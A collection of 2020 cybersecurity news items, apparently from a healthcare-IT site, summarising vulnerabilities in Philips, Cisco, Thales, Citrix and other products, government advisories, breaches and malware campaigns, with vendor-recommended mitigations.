Philips Patient Monitoring Devices Found to Have 8 Vulnerabilities

There were 8 vulnerabilities with low to moderate severity found in Philips patient monitoring equipment. Attackers could exploit the vulnerabilities resulting in data disclosure, denial of service, disrupted monitoring, and an escape from the limited setting with restricted privileges.

The following Philips patient monitoring devices were affected by the vulnerabilities:

  • Version A.01 of PerformanceBridge Focal Point
  • Versions N and earlier versions of IntelliVue X3 and X2
  • Versions B.02, C.02, C.03 of Patient Information Center iX (PICiX)
  • IntelliVue patient monitors MX100, MX400-MX850, and MP2-MP90 Versions N and earlier versions

The 8 Vulnerabilities Identified

CVE-2020-16212 with a CVSS base score of 6.8/10; rated as Moderate Severity. An unauthorized person could access a resource that is exposed to a wrong control sphere and allow him/her to escape the limited environment with restricted privileges. The attacker needs physical access to an unsecured device to exploit the vulnerability.

CVE-2020-16214 with a CVSS base score of 4.2/10; rated as Moderate Severity. User-provided data is stored in a CSV file, however, because special elements are not properly neutralized, they may be viewed as a command upon the opening of the CSV file using a spreadsheet software program.

CVE-2020-16216 with a CVSS base score of 6.5/10; rated as Moderate Severity. The device fails to validate or improperly validates input or information to make certain it has the required properties to permit its safe use. When exploited, a denial of service may occur via a system restart.

CVE-2020-16218 with a CVSS base score of 3.5/10; rated as Low Severity. The product improperly neutralizes user-controlled input prior to placing it in output and then uses it as a webpage that other users could access. An attacker could exploit this flaw to get read-only access to patient information.

CVE-2020-16220 with a CVSS base score of 3.5/10; rated as Low Severity. The product doesn’t validate or inappropriately validates the input data to comply with the syntax. An attacker could exploit this vulnerability and cause the system to crash.

CVE-2020-16222 with a CVSS base score of 5.0/10; rated as Moderate Severity. When persons assert to have a certain identity, there is inadequate authentication to verify that person’s identity, potentially permitting unauthorized data access.

CVE-2020-16224 with a CVSS base score of 6.5/10; rated as Moderate Severity. Whenever the software program parses a formatted structure or message, it can’t cope or inappropriately handles a length field that’s not consistent with the exact length of the related data. Such a problem could result in restarting the surveillance station that interrupts monitoring.

CVE-2020-16228 with a CVSS base score of 6.0/10; rated as Moderate Severity. The software erroneously checks a certificate’s revocation status then potentially allows the use of a compromised certificate.

ERNW Enno and Rey Netzwerke GmbH, security researchers at ERNW Research GmbH, discovered the vulnerabilities and reported them to Philips. Philips sent a report about the vulnerabilities to CISA and other federal agencies following the company’s coordinated vulnerability disclosure policy.

Philips received no reported cases of exploitation of the vulnerabilities in the wild and will issue updates beginning in 2020; nonetheless, for the time being, Philips advises users to do the following mitigations so that attackers will have a harder time to exploit the vulnerabilities:

  • Physically or logically separate the vulnerable devices from the local area network (LAN) of the hospital.
  • Use access control lists that limit access to the patient monitoring network just for required ports and IP addresses.
  • Restrict exposure by not running the SCEP service if not actively used to register new devices.
  • Key in a unique password made of 8-12 unknown and randomized digits when registering new devices utilizing SCEP
  • Keep the devices secure to block unauthorized persons’ login attempts and make sure to put servers in secured data centers.
  • Limit access to patient monitors located at the nurses’ stations
  • Do not allow remote access to PIC iX servers when not needed; if remote access is required, only allow remote access when needed
  • Follow the rule of least privilege and just permit trusted users to access bedside monitors.
  • Users must get in touch with Philips service support teams in their locality or region for more information on upgrading their vulnerable patient monitoring devices and implementing mitigation measures.

CISA Publishes Technical Guidance on Discovering and Responding to Malicious Network Activity

The Cybersecurity and Infrastructure Security Agency (CISA) has lately released guidance for network defenders and incident response teams on determining malicious activity and remediating cyberattacks. The guidance shares suggestions for discovering malicious activity and detailed information for looking into possible security problems and protecting compromised systems.

The objective of creating the guidance is to improve incident response among partners and network facilitators and also work as a playbook for investigating incidents. The information can support incident response groups gather the data required to check out suspicious activity throughout the network, host-based artifacts, perform a host analysis evaluation and analysis of network actions, and take the appropriate steps to minimize a cyberattack.

The guidance document was made together with cybersecurity specialists in the United States, United Kingdom, Canada, Australia and New Zealand and consists of technical support for security staff to help them determine in-progress malicious attacks and minimize attacks while minimizing the prospective unfavorable effects.

If incident response teams recognize the malicious activity, the target is frequently on ending the access of hackers to the network. Although it is crucial to ending a threat actor from gaining access to a device, or network, it is very important that the appropriate process is used to prevent alarming the attacker concerning the discovery of their presence.

Though well-intentioned to restrict the harm of the compromise, a few of those steps could have an unfavorable impact by changing volatile information that could provide a sense of what was done and informing the threat actor that the target organization knows the compromise and making the threat actor to either conceal their tracks or have more terrible actions (such as deploying ransomware.

When replying to a supposed attack it is first of all needed to gather and get rid of related artifacts, records, and information that will permit the comprehensive analysis of the incident. When these elements aren’t acquired prior to rendering any mitigations, the data can simply be missing, which will hinder any attempts to look into the breach. Systems furthermore should be secured, as a threat actor may know that the attack was discovered and modify their strategies. When systems are safeguarded and artifacts acquired, mitigating measures can be undertaken with care in order not to notify the threat actor that their presence in the system has been identified.

Any time suspicious activity is discovered, CISA suggests getting assistance from a third-party cybersecurity firm. Cybersecurity firms have the required competence to eliminate an attacker from a system and make sure that security problems are averted that may be used in further breaches on the company as soon as the incident is remediated and closed off.

Addressing a security breach demands a number of technical methods to reveal malicious activity. CISA suggests performing a lookup for identified indicators of compromise (IoCs), utilizing verified IoCs from a broad variety of sources. A frequency evaluation is helpful for discovering anomalous activity. Network defenders ought to determine regular traffic patterns in network and host systems which may be utilized to recognize the inconsistent activity. Algorithms could be employed to determine if there is an activity that isn’t in line with normal patterns and determine a variance in timing, source area, the destination area, port usage, protocol observance, file location, integrity through hash, file size, determining convention, and other characteristics.

Pattern analysis is helpful for finding programmed activity by malware and malicious scripts, and regular duplicating activities by human threat actors. An analyst review ought to likewise be done depending on the security team’s understanding of system management to recognize mistakes in collected artifacts and discover an anomalous activity that can be an indication of attacker activity.

The guidance details several of the common errors that are made whenever addressing incidents and provides technical measures and guidelines for exploration and remediation processes.

CISA in addition makes standard suggestions on defense strategies and programs that could make it more difficult for an attacker to obtain access to the system and stay there unnoticed. While these steps may not prevent an attacker from compromising a network, they will help to delay any attack that will allow incident response groups the time they needed to recognize and react to an attack.

You can see the CISA guidance Technical Approaches to Uncovering and Remediating Malicious Activity (AA20-245A) on this link.

Zero Day Vulnerabilities Found in IOS XR Software Utilized by Cisco Carrier-Grade Routers

Hackers are actively exploiting two zero-day vulnerabilities found in the IOS XR software that is used in Cisco Network Converging System carrier-grade routers. Cisco discovered the initial attempts of exploiting the vulnerabilities on August 25, 2020.

While Cisco has not released patches yet to resolve the vulnerabilities, there are ways to minimize the chances of vulnerabilities exploitation.

The CVE-2020-3566 and CVE-2020-3569 vulnerabilities are identified in the distance vector multicast routing protocol or DVMRP. They affect all Cisco devices installed with the IOS XR version of the Internetworking Operating System that is configured to utilize multicast routing. The purpose of using multicast routing is to save bandwidth and to use a single stream to send some data to several recipients.

An unauthenticated hacker can exploit the vulnerabilities by wirelessly sending a specific internet group management protocol or IGMP packets to the device and drain its process memory. If the hacker succeeds at exploiting the vulnerabilities, the device will suffer memory exhaustion, which results in a denial of service. That could make the other process like the exterior and interior routing protocols unstable.

The vulnerabilities have an assigned CVSS v3 base rating of 8.6 out of 10, which means a high risk of exploitation. Therefore, patches must be applied immediately upon release. In the meantime, implement the mitigations until the patches are available. Cisco suggested mitigations, not complete workarounds, which can minimize the risk of exploitation.

End-users of vulnerable Cisco products must restrict the rate of IGMP traffic. Administrators need to know the normal IGMP traffic rate first in order to set a rate below the average rate. Although vulnerabilities exploitation won’t be prevented, it will help reduce the traffic rate and delay the exploitation of vulnerabilities. That would give administrators more time to implement recovery steps.

To help block attacks, end-users could likewise use an access control entry (ACE) to the current existing interface control list (ACL). It’s also possible to create a new ACL for a particular interface that blocks inbound DVMRP traffic using that interface.

Cisco has issued a security advisory to help users know if their devices have multicast routing enabled and implement the mitigations. The company is also creating patches that would fix the vulnerabilities. Cisco is currently working on patches to correct the vulnerabilities.

Millions of Devices Impacted by Vulnerability Found in Thales Wireless IoT Modules

There’s a vulnerability identified in a component that is utilized in countless IoT devices. Hackers could exploit this vulnerability for stealing sensitive data and manipulating vulnerable devices to attack internal networks. Over 30,000 companies use Thales components for a wide range of industries which include energy, telecom, and healthcare.

The vulnerability exists in the Cinterion EHS8 M2M module, together with some other products in a similar category (BGS5, EHS5/6/8, ELS81, PDS5/6/8, ELS61, PLS62). The embedded modules give processing power and enable devices to transmit and receive information via wireless mobile connections. They are also employed as an electronic secure repository for sensitive data like credentials, passwords, and operational code. The vulnerability could make it possible for an attacker to access the files in that repository.

Researchers of X-Force Red found a way to circumvent the security that protect the code and data in the EHS8 module. The information stored in the module includes the Java code, which usually contain confidential data such as encryption keys, passwords, and certificates.

Attackers exploiting this vulnerability could possibly compromise hundreds of thousands of devices and gain access to networks or VPNs that support those devices by leveraging the backend network of the provider. Consequently, the attacker could get access to credentials, passwords, intellectual property, and encryption keys. Malicious actors could also use the stolen information from the modules to manipulate a device or get access to the central control system to carry out even more attacks – possibly remotely through 3G in certain cases.

With medical devices, exploiting the vulnerability could allow changes to readings in patient monitoring devices, whether to create false alerts or conceal crucial changes in the vital signs of a patient. If changes are made to a drug pump, it is possible to give an overdose or halt a dose when administering critical medication.

The researchers furthermore state that the vulnerability in smart meters employed by energy firms can be exploited to wrongly report energy consumption. This would bring about a higher or lower bills, however if an attacker controls enough numbers of devices, it could lead to grid damage and cause blackouts.

The researchers discovered the vulnerability, monitored as CVE-2020-15858, in September 2019 and notified Thales immediately. Thales, together with IBM X Force Red team worked to create, test, and supply a patch. The patch was available last February 2020. Thales is making sure that its customers know about the patch so as to apply it promptly.

Device manufacturers are taking a while to apply the patches. The patching process is noticeably slower for units employed in extremely controlled industry areas. For example, medical devices will call for recertification following patching, which is a time-consuming procedure.

Dealing with the vulnerability is mostly down to device companies, who need to prioritize patching. IBM X Force Red states that operation has been in progress for 6 months, yet there are still a lot of vulnerable devices. Patches can be applied using a USB device connected directly into the vulnerable gadget utilizing the management system or through a remote update. The latter is better, however that depends on whether the unit has internet access.

Patches Available to Resolve Critical Vulnerabilities in Citrix Endpoint Management / XenMobile Server

Two critical vulnerabilities, tracked as CVE-2020-8208 and CVE-2020-8209, were identified in Citrix Endpoint Management (CEM) / XenMobile Server. An unauthenticated attacker could exploit the vulnerabilities to access the credentials of a domain account, take complete control of an insecure XenMobile Server, and gain access to email, VPN, and web apps and get sensitive company and patient records.

A lot of businesses use CEM/ XenMobile Server to take care of employees’ mobile gadgets, install updates, control security configurations, and to support various in-house software programs. The makeup of the vulnerabilities makes it possible for hackers to move to create exploits immediately, therefore prompt patching is necessary.

There is only information about the critical vulnerability CVE-2020-8209. It is a path traversal vulnerability caused by inadequate input verification. If an unauthenticated attacker exploits this vulnerability, he could view the arbitrary files running an application on the server. Those files consist of configuration files, so the attacker could obtain the encryption keys allowing the decryption of sensitive information. The vulnerabilities can be exploited by persuading a user to go to a specially designed page online.

Andrey Medov of Positive Technologies who discovered the vulnerability said that this vulnerability enables hackers to get data that could be used to breach the perimeter since the configuration file usually keeps the credentials to the domain account meant for LDAP access. Having domain account access allows a remote attacker to get data used for authentication on accessing other external organization resources, such as company email, VPN, and web apps. Moreover, an attacker who had viewed the configuration file could obtain sensitive information, including a database password.

There are three more vulnerabilities identified rated as medium and low severity. Citrix has not released information on the vulnerabilities tracked as CVE-2020-8210, CVE-2020-8211 and CVE-2020-8212.

The critical vulnerabilities were found to impact the following devices:

XenMobile Server 10.12 prior to RP2
XenMobile Server 10.11 prior to RP4
XenMobile Server prior to 10.9 RP5
XenMobile Server 10.10 prior to RP6

The vulnerabilities with medium and low severity impact the following devices:

XenMobile Server 10.12 prior to RP3
XenMobile Server prior to 10.9 RP5
XenMobile Server 10.11 prior to RP6
XenMobile Server 10.10 prior to RP6

Citrix is convinced that hackers won’t take long to create exploits and begin exploiting the vulnerabilities, therefore it strongly recommends prompt patching.

Citrix has introduced patches recommended for XenMobile Server versions 10.9, 10.10, 10.11, and 10.12. Consumers that use version XenMobile Server 10.9x should upgrade to the software’s supported version before applying the patch. Citrix recommended an upgrade to 10.12 RP3. The XenMobile cloud versions get automatic updates, so there is no need to take any action.

FBI Prompts Companies to Upgrade Windows 7 Devices to a Supported OS

The FBI Cyber Division has released a Private Industry Notification informing businesses that continue to use Windows 7 in their system to shift to a supported operating system because of the potential exploitation of security vulnerabilities identified in the Windows 7 operating system.

The FBI has noticed a rise in cyberattacks on unsupported operating systems as soon as their end-of-life is reached. Any company that continues to use Windows 7 have a greater risk of being exploited by cybercriminals to gain remote network access. This is because of the lacking security updates and the discovery of new vulnerabilities.

The operating system of Windows 7 hit its end-of-life on January 14, 2020. Since then, Microsoft discontinued launching free patches to fix identified vulnerabilities. Microsoft is just offering security updates for the following Windows 7 products: Enterprise, Professional, and Ultimate; and only when consumers have registered for the Extended Security Update (ESU) program, which is only available until January 2023. The support cost increases as a customer participate longer in the ESU program. Although security updates are being launched for clients that have opted for the ESU program, the FBI and Microsoft firmly recommend the upgrade of Windows 7 to Windows 10 or another supported operating system.

It’s not easy to update an operating system. It may be necessary to buy new devices. New software programs have a price tag, however, the cost is minimal in comparison to the price of losing intellectual property and the risk from continually using an unsupported operating system.

A lot of companies all over the world continue to use Windows 7 on a few of their Windows gadgets. Information from Statcounter shows about 20% of all Windows units are still using Windows 7, though free security updates are not issued any longer. An open-source report released in May 2019 discovered that 71% of Windows units employed in healthcare used Windows 7 or some other operating systems that were also unsupported since January 2020. The FBI cautioned that more successful cyberattacks in healthcare occur upon as soon as the operating systems have gotten to its end of life.

The FBI stated that cybercriminals are searching for ways to access legacy Windows operating systems so as to take advantage of Remote Desktop Protocol (RDP) exploits. Last May 2019, right after discovering the BlueKeep vulnerability, Microsoft introduced patches for all supported OS’s along with a patch for Windows XP and for the unsupported OS as a way to avoid a WannaCry-style attack. Considering that the vulnerability was identified, working exploits were created to take advantage of the vulnerability and up to now, there are attacks to unpatched Windows devices.

There will vulnerabilities identified and taken advantage of unpatched operating systems. When Microsoft launched the MS17-010 patch to deal with a number of SMBv1 vulnerabilities in March 2017, a lot of companies failed to apply the patch, despite the high-risk exploitation. In May 2017, the WannaCry ransomware attacks started infecting 98% of systems, which were running Windows 7.

If companies use a supported OS, patches are instantly made accessible to resolve newly found security vulnerabilities. Using a supported OS is the most essential step for improving security.

Protecting against cybercriminals demands a multilayered strategy, which includes validation of existing software used on the computer system and approval of access controls and network settings.

Besides modernizing the operating system and using patches immediately, companies need to install antivirus software, use spam filters, and implement firewalls, that are appropriately set up and kept updated.

Network settings must be reviewed and computer systems that are not up-to-date must be singled out. The FBI additionally recommends reviewing the network systems that use RDP and disabling unused RDP ports. Implement 2-factor authentication as much as possible and log all RDP login attempts.

If there be any Windows 7 device that cannot be updated or isolated, be sure to block access over the web. Also, the company must sign up to Microsoft’s ESU program.

Allergy and Asthma Clinic of Fort Worth Hacking Incident Impacts 69,777 Patients

Allergy and Asthma Clinic of Fort Worth has uncovered an unauthorized person who obtained access to its computer programs and possibly obtained the billing details of patients. The clinic found the incident on June 4, 2020 and immediately took steps to stop even more unauthorized access. As per the breach investigation, the hacker acquired access to the network on May 20, 2020.

An evaluation of the breached computer systems showed that the attacker possibly accessed records that contain patients’ names, phone numbers, addresses, birth dates, Social Security numbers, insurance data, and details concerning the reasons for appointments.

Cybersecurity experts came to investigate the safety measures of the Allergy and Asthma Clinic of Fort Worth. Additional protections will be implemented, as necessary, to strengthen network security to prevent further data breaches.

The breach report filed with the Department of Health and Human Services’ Office for Civil Rights shows that the breach affected 69,777 people.

Chinese Hackers Targeted Biotech Company Studying COVID-19 Vaccine

Hackers targeted the biotech company Moderna based in Massachusetts to look for COVID-19 research information. Moderna was doing research on a vaccine for COVID-19 and declared its vaccine candidate in January. Reuters stated that the company found “information reconnaissance activities” in January and has contacted the FBI concerning the alleged attack.

The company is thought to have been targeted by the Chinese attackers which the Department of Justice indicted in July for carrying out an 11-year campaign of cyber espionage attacks on companies and government institutions in the U.S.

The reconnaissance is considered to have been an attempt to steal information associated with the mRNA COVID-19 vaccine developed by Moderna, which has lately entered a stage III clinical trial.

Moderna continues to be extremely cautious about possible cybersecurity threats, having an internal squad, external support services, and good work interactions with outside regulators to continually evaluate threats and safeguard its valuable data.

FBI Alert About Malware Backdoors Created by Chinese Tax Software

The FBI released a private industry warning concerning the danger of malware infection from using the Chinese tax software program after discovering two backdoors brought in by the tax software required by the Chinese government. The backdoor malware was found in the software program created by two Chinese firms to process the value-added tax (VAT) paid to the Chinese government. The two technology companies approved by the Chinese government to deliver the VAT software are Aisino and Baiwang. Any firm doing business in the PRC needs to use this software.

The FBI alert comes after Trustwave published two reports regarding backdoor malware variants known as GoldenSpy and GoldenHelper. These malware software programs offer a backdoor to access corporate networks, change privileges to an administrator, permit stealing of intellectual property by the operators, execute code remotely and install more malware payloads.

Two U.S. firms were already infected by the backdoors subsequent to getting tax software program updates, which were introduced in 2018 right after implementing modifications to the Chinese VAT regulations. The first is a U.S. pharmaceutical company found to have the GoldenHelper backdoor within its network last April 2019. The Baiwang Tax Control Invoicing software had been downloaded by an employee in July 2018. But it seems that the backdoor was only brought in in March 2019 after updating the software. Besides the software updates in the primary tax program, the installation of a driver produced the backdoor.

The second firm downloaded the Intelligent Tax software program from Aisino Corporation. According to a private cybersecurity company, the GoldenSpy backdoor was most likely brought in by the software program and implies that GoldenSpy was a new version of GoldenHelper.

The FBI identified the businesses that are most vulnerable as those belonging to the finance, healthcare, and chemical industries since state-sponsored hackers targeted those businesses in the past. The FBI made no accusation against China about adding malware to the software program. However, the FBI has mentioned that a private, state-owned business known as NISEC (National Information Security Engineering Center) that has associations to China’s People Liberation Army is supervising the two Chinese firms.

The warning came after a number of companies that read the two Trustware reports came out to say they were also infected with the malware.

Emotet Botnet Reactivated and Sending Huge Volumes of Malicious Emails

After a 5-month period of dormancy, the reactivated Emotet botnet is being utilized to send big volumes of spam emails to companies in the United Kingdom and the United States.

The Emotet botnet is a network of compromised computers that have been installed with Emotet malware. Emotet malware is an information thief and malware downloader that has been utilized to distribute various banking Trojans, such as the TrickBot Trojan.

Emotet hijacks email accounts and works by using them to send out spam emails having malicious hyperlinks and email attachments, normally Word and Excel files having destructive macros. When the macros are able to run, a PowerShell script is released that downloads Emotet malware silently. Emotet malware may likewise pass on to other devices found on the network and all malware-infected devices become a part of the botnet.

The emails being utilized in the campaign are much like earlier campaigns. They utilize pretty simple, yet effective baits to target companies, usually bogus invoices, purchase orders, shipping notifications, and receipts. The messages frequently just include a single line of text asking the recipient to click a hyperlink or open the email attachment. The emails are usually individualized and include the name of the targeted business and normally have a subject line “RE:” that indicates the email message was a response to an email sent previously by the targeted person – RE: Invoice 422132, for example. A few of the emails in this campaign have an attachment labeled as “electronic.form.”

Several security companies detected the most recent campaign. The first test emails were dispatched on July 13, and the spam email campaign started on July 17. Proofpoint discovered 30,000 messages on July 17, however right now about 250,000 emails are being sent each day.

Malwarebytes considers Emotet as the greatest malware threat of 2018 and 2019, despite having usual gaps in botnet activity. Generally, activity ceases about holiday times for several days or weeks, however, the most recent hiatus is the longest break in activity from the time the malware first came out.

Emotet itself is a risky malware type, however, it is an extra payload that Emotet downloads that result in the biggest ruin. The TrickBot Trojan is a modular malware that may do a variety of malicious capabilities, like stealing login data, sensitive documents and emails, and Bitcoin wallets. The TrickBot Trojan frequently downloads Ryuk ransomware following the operators have attained their own goals.

Upon detection of the Emotet malware, a rapid response is needed to separate the infected device and get rid of the malware. In case Emotet is identified on one device, it is probable that some other devices might have been breached.

To decrease the threat of infection, companies ought to send an advisory to their personnel cautioning them of the risk and advising them to consider extra care, specifically with emails having Word and Excel files, regardless if those emails appear to be coming from reliable contacts.

Critical Vulnerabilities Identified in the OpenClinic GA Integrated Hospital Information Management System

OpenClinic GA recognized 12 vulnerabilities existing in its open-source integrated hospital information management system.

Various hospitals and clinics utilize OpenClinic GA for handling financial, admin, clinical, pharmacy, and laboratory workflows. The system is likewise employed for out-patient and in-patient management, medical billing, ward management, bed management, and other hospital operations duties.

The person who discovered the vulnerabilities was Brian D. Hysell. Three vulnerabilities were rated critical whereas 6 were rated high severity. An attacker taking advantage of the vulnerabilities will be able to elude authentication, acquire access to confidential data, view or alter database information, and execute malicious code remotely.

An attacker having a low level of skill will be able to take advantage of the vulnerabilities. A number of vulnerabilities could be remotely exploited. Certain vulnerabilities got public exploits. The CVSS v3 base codes of the vulnerabilities vary from 5.4 to 9.8.

The following vulnerabilities were seen in OpenClinic GA Versions 5.09.02 and 5.89.05b:

CVE-2020-14495 – Critical with CVSS v3 base rating of 9.8. Using third-party components having reached their end of life and having vulnerabilities might bring about remote arbitrary code execution.

CVE-2020-14487 – Critical with a CVSS v3 base rating of 9.4. An attacker could employ a secret default user account to sign in to the program and apply arbitrary commands, unless if an administrator specifically switched off the account.

CVE-2020-14485 – Critical with a CVSS v3 base rating of 9.4. The client-side access controls can be ignored to commence a session having limited functionality, which provides administrative capabilities to execute SQL commands.

CVE-2020-14493 – High Severity with a CVSS v3 base rating of 8.8. Low privileged end-users could employ SQL syntax to keep arbitrary files in the server and carry out arbitrary orders.

CVE-2020-14488 – High Severity with a CVSS-v3 base rating of 8.8. Due to insufficient verification of uploaded data files, a low privilege user may be able to upload and execute the system’s arbitrary files.

Learn more about the CISA medical advisory here.

OpenClinic GA is already aware of the vulnerabilities and took action to take care of the problem, nevertheless, there is no evidence yet that the vulnerabilities were fixed.

All healthcare companies employing the OpenClinic GA need to upgrade their software to the current version to minimize the likelihood of exploitation.

CISA recommends carrying out the concept of least privilege, decreasing control system devices/systems exposure to networks, and not allowing system access online. All systems should be protected by a firewall and must necessitate a VPN with remote access. VPNs should use the most recent version and implement the patches right away.

Vulnerability Discovered in Capsule Technologies SmartLinx Neuron 2 Medical Data Collection Devices

A vulnerability of high severity was found in Capsule Technologies SmartLinx Neuron 2 medical data collection devices operating on software version 6.9.1. SmartLinx Neuron 2 is a bedside portable clinical computer that records vital signs information on auto pilot and links to the medical device data systems of the hospital.

The vulnerability CVE-2019-5024 is a restricted environment escape vulnerability caused by the incapability of a defense mechanism in the kiosk mode. All versions of Capsule Technologies SmartLinx Neuron 2 before version 9.0 have this vulnerability.

Kiosk mode refers to a restricted environment that inhibits users from leaving the running apps and using the base operating system. An attacker that exploits the vulnerability can leave kiosk mode and use the base operating system with complete admin privileges. That could enable the attacker to have total control of a trusted gadget on the internal network of the hospital.

An attacker must have physical access to the device in order to exploit the vulnerability. The vulnerability may be taken advantage of by linking to the device a keyboard or any HID device via a USB port. The vulnerability may be activated by using a particular sequence of keyboard inputs or, another option is by encoding a code that imitates human keyboard input together with a USB Rubber Ducky.

Patrick DeSantis of Cisco Talos discovered the vulnerability and reported it to Capsule Technologies. An attacker with a low level of skill can exploit the vulnerability as long as the public exploits for the vulnerability are available in the public domain. The CVSS v3 base score of the vulnerability is 7.6 out of 10.

The vulnerability was found in an unsupported software version, however, that version is presently being utilized in a lot of hospitals. Capsule Technologies has fixed the vulnerability in software versions 9.0 and those lower than the present 10.1 version.

All device users were instructed to update the software to the supported versions, which are version 9.0 or later. Restricted physical access to the devices must be implemented as much as can be done and it must stay beyond the organization’s security border. It is furthermore crucial to make certain that the internal systems do not completely trust the devices. When possible, the USB ports must be deactivated or blocked, and logs should be reviewed in order to identify any unauthorized peripherals on the vulnerable devices.

FBI and CISA Release Joint Advisory Concerning Threat of Malicious Cyber Activity Via Tor

The FBI and the DHS’ Cybersecurity Infrastructure Security Agency (CISA) released a joint warning lately concerning cybercriminals employing The Onion Router (Tor) in their cyberattacks.

The U.S. Navy created the Tor as a free, open-source software program in the 1990s. At this time, Tor is being employed to surf the net anonymously. The web activity of a person that is using the Tor network can’t be quickly tracked back to their IP address. Any time a Tor user visits a webpage, the IP address of the exit node he went through is logged instead of his own IP address.

Considering anonymity made available by Tor, as expected, a lot of threat actors have used it to cover their specific location and IP address and perform cyberattacks and other harmful actions without a trace. Cybercriminals are employing Tor to do spy on targets, execute cyberattacks, access and exfiltrate information, and install malware, ransomware, and perform Denial of Service (DoS) attacks. As per the advisory, cybercriminals are employing Tor too to communicate commands to ransomware and malware via their command and control servers (C2).

Because malicious actions could be executed anonymously, it is tricky for system defenders to act in response to attacks and carry out system recovery. CISA and the FBI suggest that companies carry out a risk evaluation to determine their possibility of compromise by means of Tor. The risk linked to Tor is going to be unique for each company therefore a review ought to ascertain the possibility of an attack by means of Tor, and the likelihood of success granted the mitigations and security controls that were used. Before making a decision whether or not to deter Tor traffic, it is necessary to review the factors why genuine users may be deciding to employ Tor to visit the network. Hindering Tor traffic is going to boost security although it will at the same time stop legit users of Tor from going to the network.

CISA and the FBI stated that a variety of diverse threat actors are making use of Tor in past times. There were nation-state sponsored Advanced Persistent Threat (APT) actors and/or low skill attackers. Businesses that do nothing to either stop inbound and outbound traffic by using Tor or keep an eye on traffic from Tor nodes intently are going to be at a higher danger of getting attacked.

In these Tor attacks, reconnaissance is performed, targets are picked, and active and passive scans are completed to track down vulnerabilities in public-facing programs which may be used in anonymous attacks. Basic security tools aren’t enough to locate and deter attacks, rather a selection of security solutions should be carried out and recording ought to be enabled for reviewing likely malicious activity employing both indicator and behavior-dependent reviews.

The report explained that employing an indicator-based method, network defenders could seek out security information and event management (SIEM) applications and other log review platforms to tag suspicious activities associating with the IP addresses of Tor exit nodes. The Tor Project’s Exit List Service keeps a listing of all Tor exit node IP addresses, which are downloadable. Security teams could utilize the listing to pinpoint any considerable transactions related to those IP addresses by looking at their packet capture (PCAP), web server logs and NetFlow.

When utilizing a behavior-based method, network defenders could show suspicious Tor activity by seeking the operational behavior of Tor client software and protocols, including User Datagram Protocol (UDP) and Transmission Control Protocol (TCP) ports.

FBI and CISA suggest that companies need to research and allow the pre-existing Tor recognition and mitigation capabilities inside their present endpoint and network security options, as these frequently use effective detection logic. Options like web app firewalls, router firewalls, and network/host intrusion detection systems may actually give a certain degree of Tor detection function.

Though lowering the threat is likely by barring all Tor net traffic, this extremely restrictive tactic will not entirely eradicate risk as added Tor network access points aren’t all posted freely. This method will likewise deter legit Tor traffic. Customize monitoring, examination, and rejection of web traffic to and from open Tor entry and exit nodes could be a more effective solution, even though this tactic is very likely to be resource-demanding.

Specifics of how to deter, monitor and review Tor traffic are given in the advisory, a PDF copy may be downloaded on this page.

Apache Guacamole Remote Access Software Has Serious Vulnerabilities

A number of vulnerabilities were discovered in the Apache Guacamole remote access system. Many companies used Apache Guacamole to enable administrators and workers to have remote access to Windows and Linux devices. The system became famous throughout the COVID-19 pandemic for enabling people to work from home and be connected to the company system. Apache Guacamole is embedded in a lot of network access and security solutions like Quali, Fortress, and Fortigate. It is a distinguished tool available with over 10 million Docker downloads.

Apache Guacamole is a clientless service, which means remote employees don’t need any software installed on their devices. A web browser can be used to access their company device. The software will only be installed by system administrators on a server. Depending on the system configuration, a connection is established by using SSH or RDP with Guacamole working as a link to send communications between the web browser and the user’s device.

Check Point Research examined Apache Guacamole and identified a number of reverse RDP vulnerabilities in version 1.1.0 and previous versions, and the same vulnerability in FreeRDP, which is Apache’s free RDP implementation. Remote attackers can exploit the vulnerabilities to gain code execution, enabling them to hijack servers and intercept sensitive information by spying on communications on remote sessions. The researchers observe that in a scenario where all people are working remotely, exploitation of these vulnerabilities would be similar to achieving total control of the whole organizational system.

Check Point Research stated that there are two ways to exploit the vulnerabilities. An attacker who already has a compromised desktop computer and access to the network can exploit the vulnerabilities in the Guacamole gateway as soon as a remote worker tries to sign in and access the gadget. The attacker can control the gateway and its remote networks. A malicious insider can also exploit the vulnerabilities and access the computers of other employees in the network.

The vulnerabilities can permit Heartbleed-style data disclosure and read and write access to the insecure server. The researchers bundled the vulnerabilities, raised privileges to admin, and obtained remote code execution. Check Point Research reported the bundled vulnerabilities CVE-2020-9497 and CVE-2020-9498 to the Apache Software Foundation. and had patches released on June 28, 2020.

The researchers additionally discovered that the vulnerability CVE-2018-8786 present in FreeRDP can be exploited to control the gateway. All FreeRDP versions before January 2020, version 2.0.0-rc4, use vulnerable FreeRDP versions with the CVE-2020-9498 vulnerability.

All companies that have used Apache Guacamole must make sure they have the most recent version of Apache Guacamole set up on their servers.

CISA Warning About an Ongoing Ransomware Campaign Exploiting RDP and VPNs Vulnerabilities

The DHS Cybersecurity & Infrastructure Security Agency (CISA) gave a warning concerning a continuous Nefilim ransomware campaign, subsequent to a security bulletin issued by the New Zealand Computer Emergency Response Team (CERT NZ).

Nefilim ransomware is the replacement of Nemty ransomware, which was initially discovered in February 2020. As opposed to Nemty, the Nefilim ransomware is not spread with the ransomware-as-a-service model. The ransomware developers perform their own attacks and manually deploy the ransomware after getting access to enterprise systems.

Just like other manual ransomware gangs, the victim’s data is stolen prior to installing the ransomware. The gang then threatens the victim that it will publish or sell their stolen data when they do not pay their ransom demand. The gang behind the attacks gets access to enterprise systems through vulnerabilities in virtual private networks (VPNs) and remote desktop protocol (RDP). The gang makes use of brute force strategies to take advantage of weak authentication, the absence of multi-factor authentication, and unpatched flaws in VPN software.

The moment the attackers gain a foothold in the network, they use tools like mimikatz, Cobalt Strike and PsExec for lateral movement, privilege escalation, and exfiltration of sensitive information.

The Nefilim ransomware gang is remarkably skilled and deploys advanced and well-crafted attacks. The magnitude of network infiltration indicates that it is impossible to get back from an attack merely by using backups to restore data. A thorough forensic investigation should be done to completely investigate the attack and make sure to identify and eliminate backdoors and throw out the attackers from the network once and for all.

All companies that employ unsecured remote access systems are susceptible to an attack. To avoid an attack, it is important to address RDP vulnerabilities and to fully patch and update remote access software. Strong authentication must be employed and multi-factor authentication must be activated.

Network segmentation and application whitelisting could help minimize the severity of an attack. It is crucial to monitor networks and remote access systems for indications of unauthorized access. Backups must be routinely done, and there must be one backup copy stored safely on an air-gapped device or media with no access to a network.

Alert Issued by Feds to Increase Awareness of Scams Associated to COVID-19 Economic Payments

The IRS, DHS’ Cybersecurity and Infrastructure Security Agency (CISA) and the Department of the Treasury issued a joint advisory to increase understanding of the threat of phishing and other cyberattacks associated to the Coronavirus Aid, Relief, and Economic Security (CARES) Act.

